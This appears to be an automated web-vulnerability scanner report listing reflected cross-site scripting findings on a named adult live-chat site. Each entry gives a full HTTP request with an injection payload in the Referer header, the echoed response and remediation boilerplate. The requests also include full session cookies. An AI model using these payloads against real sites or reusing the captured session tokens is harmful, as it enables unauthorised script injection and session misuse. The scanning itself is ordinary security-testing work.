The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bd48'-alert(1)-'6c03af217a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/nude-chat/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=3bd48'-alert(1)-'6c03af217a6
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:40 GMT Connection: close Content-Length: 23212 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... avascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/&rf=http://www.google.com/search?hl=en^q=3bd48'-alert(1)-'6c03af217a6&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f14'-alert(1)-'1a0426053d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/orgies/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=e2f14'-alert(1)-'1a0426053d6
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:37 GMT Connection: close Content-Length: 49057 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/&rf=http://www.google.com/search?hl=en^q=e2f14'-alert(1)-'1a0426053d6&qs=cat=1^roomid=14&qs=cat=1^roomid=14&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ae9'-alert(1)-'abc512c790d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/pornstars/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=58ae9'-alert(1)-'abc512c790d
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 265847 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/&rf=http://www.google.com/search?hl=en^q=58ae9'-alert(1)-'abc512c790d&qs=cat=1^roomid=249&qs=cat=1^roomid=249&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a6f'-alert(1)-'e56dafa5755 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/role-play/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=43a6f'-alert(1)-'e56dafa5755
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:56 GMT Connection: close Content-Length: 53309 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/&rf=http://www.google.com/search?hl=en^q=43a6f'-alert(1)-'e56dafa5755&qs=cat=1^roomid=-999&qs=cat=1^roomid=-999&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cde'-alert(1)-'7896e5dc643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-galleries/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=98cde'-alert(1)-'7896e5dc643
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:26 GMT Connection: close Content-Length: 29317 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/&rf=http://www.google.com/search?hl=en^q=98cde'-alert(1)-'7896e5dc643&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec165'-alert(1)-'39542b02b36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-photos/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ec165'-alert(1)-'39542b02b36
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 25154 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/&rf=http://www.google.com/search?hl=en^q=ec165'-alert(1)-'39542b02b36&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd985'-alert(1)-'f1142f5eb83 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-sessions/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=bd985'-alert(1)-'f1142f5eb83
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 25492 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/&rf=http://www.google.com/search?hl=en^q=bd985'-alert(1)-'f1142f5eb83&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2392'-alert(1)-'0c423d5641 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-video-features/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=b2392'-alert(1)-'0c423d5641
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 31786 Vary: Accept-Encoding
